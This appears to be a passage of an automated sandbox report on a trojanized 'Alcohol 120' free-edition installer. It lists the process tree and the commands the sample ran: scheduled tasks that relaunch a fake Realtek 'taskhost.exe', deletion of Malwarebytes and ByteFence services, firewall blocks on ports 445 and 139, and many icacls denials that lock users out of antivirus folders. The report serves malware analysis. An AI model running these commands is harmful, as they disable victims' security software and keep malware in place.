N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1152 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 1152 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 1152 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 1152 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2232 wrote to memory of 2664 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 2232 wrote to memory of 2664 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 2232 wrote to memory of 2664 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 2232 wrote to memory of 2664 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 2232 wrote to memory of 2668 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2668 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2668 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2668 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2808 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2808 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2808 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2808 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 3004 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 3004 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 3004 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 3004 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 476 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 476 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 476 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 476 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 540 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 540 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 540 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2232 wrote to memory of 1540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1540 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1540 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1540 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2232 wrote to memory of 1848 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1848 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1848 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1848 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1848 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1848 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1848 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2232 wrote to memory of 1628 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1628 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1628 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1628 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1628 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1628 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1628 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1628 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2232 wrote to memory of 1652 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\ProgramData\Setup\taskhost.exe

C:\ProgramData\Setup\taskhost.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

